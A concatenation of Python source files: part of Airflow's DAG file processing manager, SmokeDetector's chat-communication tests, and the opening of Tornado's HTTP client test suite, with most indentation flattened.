file was never processed.
:rtype: datetime
"""
stat = self._file_stats.get(file_path)
return stat.last_finish_time if stat else None
def get_start_time(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the start time of the process that's processing the
specified file or None if the file is not currently being processed
:rtype: datetime
"""
if file_path in self._processors:
return self._processors[file_path].start_time
return None
def get_run_count(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the number of times the given file has been parsed
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.run_count if stat else 0
def set_file_paths(self, new_file_paths):
"""
Update this with a new set of paths to DAG definition files.
:param new_file_paths: list of paths to DAG definition files
:type new_file_paths: list[unicode]
:return: None
"""
self._file_paths = new_file_paths
self._file_path_queue = [x for x in self._file_path_queue if x in new_file_paths]
# Stop processors that are working on deleted files
filtered_processors = {}
for file_path, processor in self._processors.items():
if file_path in new_file_paths:
filtered_processors[file_path] = processor
else:
self.log.warning("Stopping processor for %s", file_path)
Stats.decr('dag_processing.processes')
processor.terminate()
self._file_stats.pop(file_path)
self._processors = filtered_processors
def wait_until_finished(self):
"""Sleeps until all the processors are done."""
for processor in self._processors.values():
while not processor.done:
time.sleep(0.1)
def _collect_results_from_processor(self, processor) -> None:
self.log.debug("Processor for %s finished", processor.file_path)
Stats.decr('dag_processing.processes')
last_finish_time = timezone.utcnow()
if processor.result is not None:
num_dags, count_import_errors = processor.result
else:
self.log.error(
"Processor for %s exited with return code %s.", processor.file_path, processor.exit_code
)
count_import_errors = -1
num_dags = 0
stat = DagFileStat(
num_dags=num_dags,
import_errors=count_import_errors,
last_finish_time=last_finish_time,
last_duration=(last_finish_time - processor.start_time).total_seconds(),
run_count=self.get_run_count(processor.file_path) + 1,
)
self._file_stats[processor.file_path] = stat
def collect_results(self) -> None:
"""Collect the result from any finished DAG processors"""
ready = multiprocessing.connection.wait(self.waitables.keys() - [self._signal_conn], timeout=0)
for sentinel in ready:
if sentinel is self._signal_conn:
continue
processor = cast(AbstractDagFileProcessorProcess, self.waitables[sentinel])
self.waitables.pop(processor.waitable_handle)
self._processors.pop(processor.file_path)
self._collect_results_from_processor(processor)
self.log.debug("%s/%s DAG parsing processes running", len(self._processors), self._parallelism)
self.log.debug("%s file paths queued for processing", len(self._file_path_queue))
def start_new_processes(self):
"""Start more processors if we have enough slots and files to process"""
waiting_queue = []
while self._parallelism - len(self._processors) > 0 and self._file_path_queue:
file_path = self._file_path_queue.pop(0)
            # Wait until the current processor for this file finishes before starting another one
if file_path in self._processors:
waiting_queue.append(file_path)
continue
callback_to_execute_for_file = self._callback_to_execute[file_path]
processor = self._processor_factory(
file_path, callback_to_execute_for_file, self._dag_ids, self._pickle_dags
)
del self._callback_to_execute[file_path]
Stats.incr('dag_processing.processes')
processor.start()
self.log.debug("Started a process (PID: %s) to generate tasks for %s", processor.pid, file_path)
self._processors[file_path] = processor
self.waitables[processor.waitable_handle] = processor
waiting_queue.reverse()
for waiting_file_path in waiting_queue:
self._file_path_queue.insert(0, waiting_file_path)
    def prepare_file_path_queue(self):
        """Generate more file paths to process. Results are saved in _file_path_queue."""
self._parsing_start_time = time.perf_counter()
# If the file path is already being processed, or if a file was
# processed recently, wait until the next batch
file_paths_in_progress = self._processors.keys()
now = timezone.utcnow()
file_paths_recently_processed = []
for file_path in self._file_paths:
last_finish_time = self.get_last_finish_time(file_path)
if (
last_finish_time is not None
and (now - last_finish_time).total_seconds() < self._file_process_interval
):
file_paths_recently_processed.append(file_path)
files_paths_at_run_limit = [
file_path for file_path, stat in self._file_stats.items() if stat.run_count == self._max_runs
]
files_paths_to_queue = list(
set(self._file_paths)
- set(file_paths_in_progress)
- set(file_paths_recently_processed)
- set(files_paths_at_run_limit)
)
for file_path, processor in self._processors.items():
self.log.debug(
"File path %s is still being processed (started: %s)",
processor.file_path,
processor.start_time.isoformat(),
)
self.log.debug("Queuing the following files for processing:\n\t%s", "\n\t".join(files_paths_to_queue))
for file_path in files_paths_to_queue:
if file_path not in self._file_stats:
self._file_stats[file_path] = DagFileStat(
num_dags=0, import_errors=0, last_finish_time=None, last_duration=None, run_count=0
)
self._file_path_queue.extend(files_paths_to_queue)
@provide_session
def _find_zombies(self, session):
"""
        Find zombie task instances, which are tasks that haven't heartbeated for too long,
        and update the current zombie list.
"""
now = timezone.utcnow()
if (
not self._last_zombie_query_time
or (now - self._last_zombie_query_time).total_seconds() > self._zombie_query_interval
):
# to avoid circular imports
from airflow.jobs.local_task_job import LocalTaskJob as LJ
self.log.info("Finding 'running' jobs without a recent heartbeat")
TI = airflow.models.TaskInstance
DM = airflow.models.DagModel
limit_dttm = timezone.utcnow() - timedelta(seconds=self._zombie_threshold_secs)
self.log.info("Failing jobs without heartbeat after %s", limit_dttm)
zombies = (
session.query(TI, DM.fileloc)
.join(LJ, TI.job_id == LJ.id)
.join(DM, TI.dag_id == DM.dag_id)
.filter(TI.state == State.RUNNING)
.filter(
or_(
LJ.state != State.RUNNING,
LJ.latest_heartbeat < limit_dttm,
)
)
.all()
)
self._last_zombie_query_time = timezone.utcnow()
for ti, file_loc in zombies:
request = TaskCallbackRequest(
full_filepath=file_loc,
simple_task_instance=SimpleTaskInstance(ti),
msg="Detected as zombie",
)
self.log.info("Detected zombie job: %s", request)
self._add_callback_to_queue(request)
Stats.incr('zombies_killed')
    def _kill_timed_out_processors(self):
        """Kill any file processors that time out to defend against process hangs."""
now = timezone.utcnow()
for file_path, processor in self._processors.items():
duration = now - processor.start_time
if duration > self._processor_timeout:
self.log.error(
"Processor for %s with PID %s started at %s has timed out, killing it.",
file_path,
processor.pid,
processor.start_time.isoformat(),
)
Stats.decr('dag_processing.processes')
Stats.incr('dag_processing.processor_timeouts')
# TODO: Remove after Airflow 2.0
Stats.incr('dag_file_processor_timeouts')
processor.kill()
def max_runs_reached(self):
""":return: whether all file paths have been processed max_runs times"""
if self._max_runs == -1: # Unlimited runs.
return False
for stat in self._file_stats.values():
if stat.run_count < self._max_runs:
return False
if self._num_run < self._max_runs:
return False
return True
def terminate(self):
"""
Stops all running processors
:return: None
"""
self._stop_listen_events()
for processor in self._processors.values():
Stats.decr('dag_processing.processes')
processor.terminate()
def end(self):
"""
        Kill all child processes on exit since we don't want to leave
        them orphaned.
"""
self._stop_listen_events()
pids_to_kill = self.get_all_pids()
if pids_to_kill:
kill_child_processes_by_pids(pids_to_kill)
def emit_metrics(self):
"""
Emit metrics about dag parsing summary
This is called once every time around the parsing "loop" - i.e. after
all files have been parsed.
"""
parse_time = time.perf_counter() - self._parsing_start_time
Stats.gauge('dag_processing.total_parse_time', parse_time)
Stats.gauge('dagbag_size', sum(stat.num_dags for stat in self._file_stats.values()))
Stats.gauge(
'dag_processing.import_errors', sum(stat.import_errors for stat in self._file_stats.values())
)
# pylint: disable=missing-docstring
@property
def file_paths(self):
return self._file_paths
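# A simplified, standalone sketch of the scheduling pattern that
# DagFileProcessorManager above implements: at most `parallelism` files are
# parsed at once, and a file is not re-parsed more often than every
# `min_interval` seconds. `start_processor(path)` and its `.done` attribute are
# hypothetical stand-ins for the real processor factory and process handle.
def _example_bounded_parsing_loop(file_paths, start_processor, parallelism=2, min_interval=30.0, max_loops=10):
    import time as _time
    running = {}      # file path -> processor handle
    last_finish = {}  # file path -> monotonic timestamp of the last completed parse
    queue = list(file_paths)
    for _ in range(max_loops):
        # Reap finished processors and record when they finished.
        for path, proc in list(running.items()):
            if proc.done:
                last_finish[path] = _time.monotonic()
                running.pop(path)
        # Refill the queue with files that are idle and outside their cool-down window.
        if not queue:
            now = _time.monotonic()
            queue = [
                path for path in file_paths
                if path not in running
                and (path not in last_finish or now - last_finish[path] >= min_interval)
            ]
        # Launch new processors while there are free slots.
        while queue and len(running) < parallelism:
            path = queue.pop(0)
            running[path] = start_processor(path)
        _time.sleep(0.1)
    return last_finish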
|
test_chatcommunicate.py
|
import chatcommunicate
import chatcommands
from globalvars import GlobalVars
from datahandling import _remove_pickle
import collections
import io
import os
import os.path
import pytest
import threading
import time
import yaml
from fake import Fake
from unittest.mock import Mock, patch
def test_validate_yaml():
    with open("rooms.yml", "r") as f:
        room_data = yaml.safe_load(f.read())
    with open("users.yml", "r") as f:
        user_data = yaml.safe_load(f.read())
flatten = lambda l: [item for sublist in l for item in sublist]
privileged_users = []
for site, site_rooms in room_data.items():
for room_id, room in site_rooms.items():
if "privileges" not in room:
continue
if "additional" in room["privileges"]:
privileged_users.append(room["privileges"]["additional"])
if "inherit" not in room["privileges"]:
privileged_users.append(room["privileges"])
privileged_users = set(flatten(privileged_users))
for uid in privileged_users:
if uid not in user_data:
pytest.fail("Privileged user {} does not have a corresponding entry in users.yml".format(uid))
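# A hypothetical helper sketching the same cross-file consistency check that
# test_validate_yaml performs above: every user granted extra privileges in
# rooms.yml must also appear in users.yml. It returns the offending ids instead
# of failing a test, so the logic could be reused outside of pytest.
def _example_find_unknown_privileged_users(rooms_file="rooms.yml", users_file="users.yml"):
    with open(rooms_file, "r") as f:
        room_data = yaml.safe_load(f.read())
    with open(users_file, "r") as f:
        user_data = yaml.safe_load(f.read())
    unknown = set()
    for site_rooms in room_data.values():
        for room in site_rooms.values():
            if "privileges" not in room:
                continue
            privileges = room["privileges"]
            # "privileges" is either a plain collection of user ids or a mapping
            # with an "additional" list and, optionally, an "inherit" key.
            if "additional" in privileges:
                unknown.update(uid for uid in privileges["additional"] if uid not in user_data)
            if "inherit" not in privileges:
                unknown.update(uid for uid in privileges if uid not in user_data)
    return unknown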
def test_parse_room_config():
chatcommunicate.parse_room_config("test/test_rooms.yml")
assert ("stackexchange.com", 11540) in chatcommunicate._command_rooms
assert ("stackexchange.com", 30332) in chatcommunicate._command_rooms
assert ("stackoverflow.com", 111347) in chatcommunicate._command_rooms
assert ("stackexchange.com", 3) not in chatcommunicate._command_rooms
assert ("stackexchange.com", 54445) not in chatcommunicate._command_rooms
assert ("meta.stackexchange.com", 89) not in chatcommunicate._command_rooms
assert ("stackexchange.com", 11540) in chatcommunicate._watcher_rooms
assert ("stackexchange.com", 3) in chatcommunicate._watcher_rooms
assert ("meta.stackexchange.com", 89) in chatcommunicate._watcher_rooms
assert ("stackexchange.com", 30332) not in chatcommunicate._watcher_rooms
assert ("stackexchange.com", 54445) not in chatcommunicate._watcher_rooms
assert ("stackoverflow.com", 111347) not in chatcommunicate._watcher_rooms
assert chatcommunicate._privileges[("stackexchange.com", 11540)] == {121520, 10145}
assert chatcommunicate._privileges[("stackexchange.com", 30332)] == {121520, 10145}
assert chatcommunicate._privileges[("stackexchange.com", 3)] == set()
assert chatcommunicate._privileges[("stackexchange.com", 54445)] == set()
assert chatcommunicate._privileges[("meta.stackexchange.com", 89)] == {262823}
assert chatcommunicate._privileges[("stackoverflow.com", 111347)] == {3160466, 603346}
assert len(chatcommunicate._room_roles) == 5
assert chatcommunicate._room_roles["debug"] == {("stackexchange.com", 11540)}
assert chatcommunicate._room_roles["all"] == {("stackexchange.com", 11540),
("stackexchange.com", 54445),
("stackoverflow.com", 111347)}
assert chatcommunicate._room_roles["metatavern"] == {("meta.stackexchange.com", 89)}
assert chatcommunicate._room_roles["delay"] == {("meta.stackexchange.com", 89)}
assert chatcommunicate._room_roles["no-all-caps title"] == {("meta.stackexchange.com", 89)}
@patch("chatcommunicate.threading.Thread")
@patch("chatcommunicate.Client")
@patch("chatcommunicate.parse_room_config")
def test_init(room_config, client_constructor, thread):
client = Mock()
client_constructor.return_value = client
client.login.side_effect = Exception()
# https://stackoverflow.com/questions/23337471/
with pytest.raises(Exception) as e:
chatcommunicate.init("shoutouts", "to simpleflips", try_cookies=False)
assert str(e).endswith("Failed to log into {}, max retries exceeded".format(next(iter(chatcommunicate._clients))))
client.login.side_effect = None
client.login.reset_mock()
client_constructor.reset_mock()
room_config.side_effect = lambda _: room_config.get_original()("test/test_rooms.yml")
GlobalVars.standby_mode = True
# See GitHub Issue #2498, temporary workaround
try:
chatcommunicate.init("shoutouts", "to simpleflips", try_cookies=False)
except Exception:
return # This interferes with the following tests
assert len(chatcommunicate._rooms) == 0
assert client_constructor.call_count == 3
client_constructor.assert_any_call("stackexchange.com")
client_constructor.assert_any_call("stackoverflow.com")
client_constructor.assert_any_call("meta.stackexchange.com")
assert thread.call_count == 2
thread.assert_any_call(name="pickle ---rick--- runner", target=chatcommunicate.pickle_last_messages, daemon=True)
thread.assert_any_call(name="message sender", target=chatcommunicate.send_messages, daemon=True)
client.login.reset_mock()
client_constructor.reset_mock()
thread.reset_mock()
GlobalVars.standby_mode = False
counter = 0
def throw_every_other(*_):
nonlocal counter
counter += 1
if counter & 1:
raise Exception()
client.login.side_effect = throw_every_other
# See GitHub Issue #2498, temporary workaround
try:
chatcommunicate.init("shoutouts", "to simpleflips", try_cookies=False)
    except Exception:
return # Because this causes the following checks to fail
assert client_constructor.call_count == 3
client_constructor.assert_any_call("stackexchange.com")
client_constructor.assert_any_call("stackoverflow.com")
client_constructor.assert_any_call("meta.stackexchange.com")
assert thread.call_count == 2
thread.assert_any_call(name="pickle ---rick--- runner", target=chatcommunicate.pickle_last_messages, daemon=True)
thread.assert_any_call(name="message sender", target=chatcommunicate.send_messages, daemon=True)
assert len(chatcommunicate._rooms) == 3
assert chatcommunicate._rooms[("stackexchange.com", 11540)].deletion_watcher is True
assert chatcommunicate._rooms[("stackexchange.com", 30332)].deletion_watcher is False
assert chatcommunicate._rooms[("stackoverflow.com", 111347)].deletion_watcher is False
@pytest.mark.skipif(os.path.isfile("messageData.p"), reason="shouldn't overwrite file")
@patch("chatcommunicate.pickle.dump")
def test_pickle_rick(dump):
try:
threading.Thread(target=chatcommunicate.pickle_last_messages, daemon=True).start()
chatcommunicate._pickle_run.set()
# Yield to the pickling thread until it acquires the lock again
while len(chatcommunicate._pickle_run._cond._waiters) == 0:
time.sleep(0)
assert dump.call_count == 1
call, _ = dump.call_args_list[0]
assert isinstance(call[0], chatcommunicate.LastMessages)
assert isinstance(call[1], io.IOBase) and call[1].name == "messageData.p"
finally:
_remove_pickle("messageData.p")
@patch("chatcommunicate._pickle_run")
def test_message_sender(pickle_rick):
chatcommunicate._last_messages = chatcommunicate.LastMessages({}, collections.OrderedDict())
threading.Thread(target=chatcommunicate.send_messages, daemon=True).start()
room = chatcommunicate.RoomData(Mock(), -1, False)
room.room.id = 11540
room.room._client.host = "stackexchange.com"
room.room._client._do_action_despite_throttling.return_value = Fake({"json": lambda: {"id": 1}})
chatcommunicate._msg_queue.put((room, "test", None))
while not chatcommunicate._msg_queue.empty():
time.sleep(0)
room.room._client._do_action_despite_throttling.assert_called_once_with(("send", 11540, "test"))
room.room.reset_mock()
assert chatcommunicate._last_messages.messages[("stackexchange.com", 11540)] == collections.deque((1,))
room.room.id = 30332
room.room._client._do_action_despite_throttling.return_value = Fake({"json": lambda: {"id": 2}})
chatcommunicate._msg_queue.put((room, "test", "did you hear about what happened to pluto"))
while not chatcommunicate._msg_queue.empty():
time.sleep(0)
room.room._client._do_action_despite_throttling.assert_called_once_with(("send", 30332, "test"))
assert chatcommunicate._last_messages.messages[("stackexchange.com", 11540)] == collections.deque((1,))
assert chatcommunicate._last_messages.reports == collections.OrderedDict({("stackexchange.com", 2): "did you hear about what happened to pluto"})
@patch("chatcommunicate._msg_queue.put")
@patch("chatcommunicate.get_last_messages")
def test_on_msg(get_last_messages, post_msg):
client = Fake({
"_br": {
"user_id": 1337
},
"host": "stackexchange.com"
})
room_data = chatcommunicate.RoomData(Mock(), -1, False)
chatcommunicate._rooms[("stackexchange.com", 11540)] = room_data
chatcommunicate.on_msg(Fake({}, spec=chatcommunicate.events.MessageStarred), None) # don't reply to events we don't care about
msg1 = Fake({
"message": {
"room": {
"id": 11540,
},
"owner": {
"id": 1,
},
"parent": None,
"content": "shoutouts to simpleflips"
}
}, spec=chatcommunicate.events.MessagePosted)
chatcommunicate.on_msg(msg1, client)
msg2 = Fake({
"message": {
"room": {
"id": 11540
},
"owner": {
"id": 1337
},
"id": 999,
"parent": None,
"content": "!!/not_actually_a_command"
}
}, spec=chatcommunicate.events.MessagePosted)
chatcommunicate.on_msg(msg2, client)
msg3 = Fake({
"message": {
"room": {
"id": 11540,
},
"owner": {
"id": 1
},
"id": 999,
"parent": None,
"content": "!!/a_command"
}
}, spec=chatcommunicate.events.MessagePosted)
mock_command = Mock(side_effect=lambda *_, **kwargs: "hi" if not kwargs["quiet_action"] else "")
chatcommunicate._prefix_commands["a_command"] = (mock_command, (0, 0))
chatcommunicate.on_msg(msg3, client)
assert post_msg.call_count == 1
assert post_msg.call_args_list[0][0][0][1] == ":999 hi"
mock_command.assert_called_once_with(original_msg=msg3.message, alias_used="a_command", quiet_action=False)
post_msg.reset_mock()
mock_command.reset_mock()
msg3.message.content = "!!/a_command-"
chatcommunicate.on_msg(msg3, client)
post_msg.assert_not_called()
mock_command.assert_called_once_with(original_msg=msg3.message, alias_used="a_command", quiet_action=True)
post_msg.reset_mock()
mock_command.reset_mock()
chatcommunicate._prefix_commands["a_command"] = (mock_command, (0, 1))
chatcommunicate.on_msg(msg3, client)
post_msg.assert_not_called()
mock_command.assert_called_once_with(None, original_msg=msg3.message, alias_used="a_command", quiet_action=True)
post_msg.reset_mock()
mock_command.reset_mock()
msg3.message.content = "!!/a_command 1 2 3"
chatcommunicate.on_msg(msg3, client)
assert post_msg.call_count == 1
assert post_msg.call_args_list[0][0][0][1] == ":999 hi"
mock_command.assert_called_once_with("1 2 3", original_msg=msg3.message, alias_used="a_command", quiet_action=False)
post_msg.reset_mock()
mock_command.reset_mock()
chatcommunicate._prefix_commands["a_command"] = (mock_command, (1, 2))
msg3.message.content = "!!/a_command"
chatcommunicate.on_msg(msg3, client)
assert post_msg.call_count == 1
assert post_msg.call_args_list[0][0][0][1] == ":999 Too few arguments."
mock_command.assert_not_called()
post_msg.reset_mock()
mock_command.reset_mock()
msg3.message.content = "!!/a_command 1 2 oatmeal"
chatcommunicate.on_msg(msg3, client)
assert post_msg.call_count == 1
assert post_msg.call_args_list[0][0][0][1] == ":999 Too many arguments."
mock_command.assert_not_called()
post_msg.reset_mock()
mock_command.reset_mock()
msg3.message.content = "!!/a_command- 1 2"
chatcommunicate.on_msg(msg3, client)
post_msg.assert_not_called()
mock_command.assert_called_once_with("1", "2", original_msg=msg3.message, alias_used="a_command", quiet_action=True)
post_msg.reset_mock()
mock_command.reset_mock()
msg3.message.content = "!!/a_command 3"
chatcommunicate.on_msg(msg3, client)
assert post_msg.call_count == 1
assert post_msg.call_args_list[0][0][0][1] == ":999 hi"
mock_command.assert_called_once_with("3", None, original_msg=msg3.message, alias_used="a_command", quiet_action=False)
post_msg.reset_mock()
mock_command.reset_mock()
msg4 = Fake({
"message": {
"room": {
"id": 11540,
},
"owner": {
"id": 1
},
"parent": {
"owner": {
"id": 2
}
},
"id": 1000,
"content": "asdf"
}
}, spec=chatcommunicate.events.MessageEdited)
chatcommunicate.on_msg(msg4, client)
msg5 = Fake({
"message": {
"room": {
"id": 11540,
},
"owner": {
"id": 1
},
"parent": {
"owner": {
"id": 1337
}
},
"id": 1000,
"content": "@SmokeDetector why "
}
}, spec=chatcommunicate.events.MessageEdited)
chatcommunicate._reply_commands["why"] = (mock_command, (0, 0))
threw_exception = False
try:
chatcommunicate.on_msg(msg5, client)
except AssertionError:
threw_exception = True
assert threw_exception
mock_command.assert_not_called()
post_msg.assert_not_called()
chatcommunicate._reply_commands["why"] = (mock_command, (1, 1))
chatcommunicate.on_msg(msg5, client)
assert post_msg.call_count == 1
assert post_msg.call_args_list[0][0][0][1] == ":1000 hi"
mock_command.assert_called_once_with(msg5.message.parent, original_msg=msg5.message, alias_used="why", quiet_action=False)
post_msg.reset_mock()
mock_command.reset_mock()
msg5.message.content = "@SmokeDetector why@!@#-"
chatcommunicate.on_msg(msg5, client)
post_msg.assert_not_called()
mock_command.assert_called_once_with(msg5.message.parent, original_msg=msg5.message, alias_used="why", quiet_action=True)
msg6 = Fake({
"message": {
"room": {
"id": 11540,
},
"owner": {
"id": 1
},
"id": 1000,
"parent": None,
"content": "sd why - 2why 2why- 2- why- "
}
}, spec=chatcommunicate.events.MessageEdited)
get_last_messages.side_effect = lambda _, num: (Fake({"id": i}) for i in range(num))
chatcommunicate.on_msg(msg6, client)
assert post_msg.call_count == 1
assert post_msg.call_args_list[0][0][0][1] == ":1000 [:0] hi\n[:1] <skipped>\n[:2] hi\n[:3] hi\n[:4] <processed without return value>\n[:5] <processed without return value>\n[:6] <skipped>\n[:7] <skipped>\n[:8] <processed without return value>"
def test_message_type():
fake1 = Fake({}, spec=chatcommunicate.Message)
assert chatcommands.message(fake1) == fake1
fake2 = Fake({})
threw_exception = False
try:
chatcommands.message(fake2)
except AssertionError:
threw_exception = True
assert threw_exception
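# A hypothetical sketch of how a prefix command is registered, using the same
# chatcommunicate._prefix_commands registry and (min_args, max_args) convention
# exercised by the tests above. "echo_args" is an invented command name used
# purely for illustration; it is not part of the real command set.
def _example_register_echo_command():
    def echo_args(*args, original_msg=None, alias_used=None, quiet_action=False):
        # Handlers receive the parsed positional arguments plus keyword context.
        # Returning an empty string (the quiet "-" form) suppresses the reply;
        # any other string is posted back prefixed with ":<message id>".
        return "" if quiet_action else " ".join(str(a) for a in args if a is not None)
    # Accept one or two positional arguments, i.e. "!!/echo_args foo [bar]".
    chatcommunicate._prefix_commands["echo_args"] = (echo_args, (1, 2))
    return echo_args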
|
httpclient_test.py
|
#!/usr/bin/env python
from __future__ import absolute_import, division, print_function, with_statement
import base64
import binascii
from contextlib import closing
import copy
import functools
import sys
import threading
import datetime
from io import BytesIO
from tornado.escape import utf8
from tornado import gen
from tornado.httpclient import HTTPRequest, HTTPResponse, _RequestProxy, HTTPError, HTTPClient
from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
from tornado.iostream import IOStream
from tornado.log import gen_log
from tornado import netutil
from tornado.stack_context import ExceptionStackContext, NullContext
from tornado.testing import AsyncHTTPTestCase, bind_unused_port, gen_test, ExpectLog
from tornado.test.util import unittest, skipOnTravis
from tornado.util import u
from tornado.web import Application, RequestHandler, url
from tornado.httputil import format_timestamp, HTTPHeaders
class HelloWorldHandler(RequestHandler):
def get(self):
name = self.get_argument("name", "world")
self.set_header("Content-Type", "text/plain")
self.finish("Hello %s!" % name)
class PostHandler(RequestHandler):
def post(self):
self.finish("Post arg1: %s, arg2: %s" % (
self.get_argument("arg1"), self.get_argument("arg2")))
class PutHandler(RequestHandler):
def put(self):
self.write("Put body: ")
self.write(self.request.body)
class RedirectHandler(RequestHandler):
def prepare(self):
self.write('redirects can have bodies too')
self.redirect(self.get_argument("url"),
status=int(self.get_argument("status", "302")))
class ChunkHandler(RequestHandler):
@gen.coroutine
def get(self):
self.write("asdf")
self.flush()
# Wait a bit to ensure the chunks are sent and received separately.
yield gen.sleep(0.01)
self.write("qwer")
class AuthHandler(RequestHandler):
def get(self):
self.finish(self.request.headers["Authorization"])
class CountdownHandler(RequestHandler):
def get(self, count):
count = int(count)
if count > 0:
self.redirect(self.reverse_url("countdown", count - 1))
else:
self.write("Zero")
class EchoPostHandler(RequestHandler):
def post(self):
self.write(self.request.body)
class UserAgentHandler(RequestHandler):
def get(self):
self.write(self.request.headers.get('User-Agent', 'User agent not set'))
class ContentLength304Handler(RequestHandler):
def get(self):
self.set_status(304)
self.set_header('Content-Length', 42)
def _clear_headers_for_304(self):
# Tornado strips content-length from 304 responses, but here we
# want to simulate servers that include the headers anyway.
pass
class PatchHandler(RequestHandler):
def patch(self):
"Return the request payload - so we can check it is being kept"
self.write(self.request.body)
class AllMethodsHandler(RequestHandler):
SUPPORTED_METHODS = RequestHandler.SUPPORTED_METHODS + ('OTHER',)
def method(self):
self.write(self.request.method)
get = post = put = delete = options = patch = other = method
# These tests end up getting run redundantly: once here with the default
# HTTPClient implementation, and then again in each implementation's own
# test suite.
class HTTPClientCommonTestCase(AsyncHTTPTestCase):
def get_app(self):
return Application([
url("/hello", HelloWorldHandler),
url("/post", PostHandler),
url("/put", PutHandler),
url("/redirect", RedirectHandler),
url("/chunk", ChunkHandler),
url("/auth", AuthHandler),
url("/countdown/([0-9]+)", CountdownHandler, name="countdown"),
url("/echopost", EchoPostHandler),
url("/user_agent", UserAgentHandler),
url("/304_with_content_length", ContentLength304Handler),
url("/all_methods", AllMethodsHandler),
url('/patch', PatchHandler),
], gzip=True)
def test_patch_receives_payload(self):
body = b"some patch data"
response = self.fetch("/patch", method='PATCH', body=body)
self.assertEqual(response.code, 200)
self.assertEqual(response.body, body)
@skipOnTravis
def test_hello_world(self):
response = self.fetch("/hello")
self.assertEqual(response.code, 200)
self.assertEqual(response.headers["Content-Type"], "text/plain")
self.assertEqual(response.body, b"Hello world!")
self.assertEqual(int(response.request_time), 0)
response = self.fetch("/hello?name=Ben")
self.assertEqual(response.body, b"Hello Ben!")
def test_streaming_callback(self):
# streaming_callback is also tested in test_chunked
chunks = []
response = self.fetch("/hello",
streaming_callback=chunks.append)
# with streaming_callback, data goes to the callback and not response.body
self.assertEqual(chunks, [b"Hello world!"])
self.assertFalse(response.body)
def test_post(self):
response = self.fetch("/post", method="POST",
body="arg1=foo&arg2=bar")
self.assertEqual(response.code, 200)
self.assertEqual(response.body, b"Post arg1: foo, arg2: bar")
def test_chunked(self):
response = self.fetch("/chunk")
self.assertEqual(response.body, b"asdfqwer")
chunks = []
response = self.fetch("/chunk",
streaming_callback=chunks.append)
self.assertEqual(chunks, [b"asdf", b"qwer"])
self.assertFalse(response.body)
def test_chunked_close(self):
# test case in which chunks spread read-callback processing
# over several ioloop iterations, but the connection is already closed.
sock, port = bind_unused_port()
with closing(sock):
def write_response(stream, request_data):
if b"HTTP/1." not in request_data:
self.skipTest("requires HTTP/1.x")
                stream.write(b"""\
HTTP/1.1 200 OK
Transfer-Encoding: chunked

1
1
1
2
0

""".replace(b"\n", b"\r\n"), callback=stream.close)
def accept_callback(conn, address):
# fake an HTTP server using chunked encoding where the final chunks
# and connection close all happen at once
stream = IOStream(conn, io_loop=self.io_loop)
stream.read_until(b"\r\n\r\n",
functools.partial(write_response, stream))
netutil.add_accept_handler(sock, accept_callback, self.io_loop)
self.http_client.fetch("http://127.0.0.1:%d/" % port, self.stop)
resp = self.wait()
resp.rethrow()
self.assertEqual(resp.body, b"12")
self.io_loop.remove_handler(sock.fileno())
def test_streaming_stack_context(self):
chunks = []
exc_info = []
def error_handler(typ, value, tb):
exc_info.append((typ, value, tb))
return True
def streaming_cb(chunk):
chunks.append(chunk)
if chunk == b'qwer':
1 / 0
with ExceptionStackContext(error_handler):
self.fetch('/chunk', streaming_callback=streaming_cb)
self.assertEqual(chunks, [b'asdf', b'qwer'])
self.assertEqual(1, len(exc_info))
self.assertIs(exc_info[0][0], ZeroDivisionError)
def test_basic_auth(self):
self.assertEqual(self.fetch("/auth", auth_username="Aladdin",
auth_password="open sesame").body,
b"Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==")
def test_basic_auth_explicit_mode(self):
self.assertEqual(self.fetch("/auth", auth_username="Aladdin",
auth_password="open sesame",
auth_mode="basic").body,
b"Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==")
def test_unsupported_auth_mode(self):
# curl and simple clients handle errors a bit differently; the
# important thing is that they don't fall back to basic auth
# on an unknown mode.
with ExpectLog(gen_log, "uncaught exception", required=False):
with self.assertRaises((ValueError, HTTPError)):
response = self.fetch("/auth", auth_username="Aladdin",
auth_password="open sesame",
auth_mode="asdf")
response.rethrow()
def test_follow_redirect(self):
response = self.fetch("/countdown/2", follow_redirects=False)
self.assertEqual(302, response.code)
self.assertTrue(response.headers["Location"].endswith("/countdown/1"))
response = self.fetch("/countdown/2")
self.assertEqual(200, response.code)
self.assertTrue(response.effective_url.endswith("/countdown/0"))
self.assertEqual(b"Zero", response.body)
def test_credentials_in_url(self):
url = self.get_url("/auth").replace("http://", "http://me:secret@")
self.http_client.fetch(url, self.stop)
response = self.wait()
self.assertEqual(b"Basic " + base64.b64encode(b"me:secret"),
response.body)
def test_body_encoding(self):
unicode_body = u("\xe9")
byte_body = binascii.a2b_hex(b"e9")
# unicode string in body gets converted to utf8
response = self.fetch("/echopost", method="POST", body=unicode_body,
headers={"Content-Type": "application/blah"})
self.assertEqual(response.headers["Content-Length"], "2")
self.assertEqual(response.body, utf8(unicode_body))
# byte strings pass through directly
response = self.fetch("/echopost", method="POST",
body=byte_body,
headers={"Content-Type": "application/blah"})
self.assertEqual(response.headers["Content-Length"], "1")
self.assertEqual(response.body, byte_body)
# Mixing unicode in headers and byte string bodies shouldn't
# break anything
response = self.fetch("/echopost", method="POST", body=byte_body,
headers={"Content-Type": "application/blah"},
user_agent=u("foo"))
self.assertEqual(response.headers["Content-Length"], "1")
self.assertEqual(response.body, byte_body)
def test_types(self):
response = self.fetch("/hello")
self.assertEqual(type(response.body), bytes)
self.assertEqual(type(response.headers["Content-Type"]), str)
self.assertEqual(type(response.code), int)
self.assertEqual(type(response.effective_url), str)
def test_header_callback(self):
first_line = []
headers = {}
chunks = []
def header_callback(header_line):
if header_line.startswith('HTTP/1.1 101'):
# Upgrading to HTTP/2
pass
elif header_line.startswith('HTTP/'):
first_line.append(header_line)
elif header_line != '\r\n':
k, v = header_line.split(':', 1)
headers[k.lower()] = v.strip()
def streaming_callback(chunk):
# All header callbacks are run before any streaming callbacks,
# so the header data is available to process the data as it
# comes in.
self.assertEqual(headers['content-type'], 'text/html; charset=UTF-8')
chunks.append(chunk)
self.fetch('/chunk', header_callback=header_callback,
streaming_callback=streaming_callback)
self.assertEqual(len(first_line), 1, first_line)
self.assertRegexpMatches(first_line[0], 'HTTP/[0-9]\\.[0-9] 200.*\r\n')
self.assertEqual(chunks, [b'asdf', b'qwer'])
def test_header_callback_stack_context(self):
exc_info = []
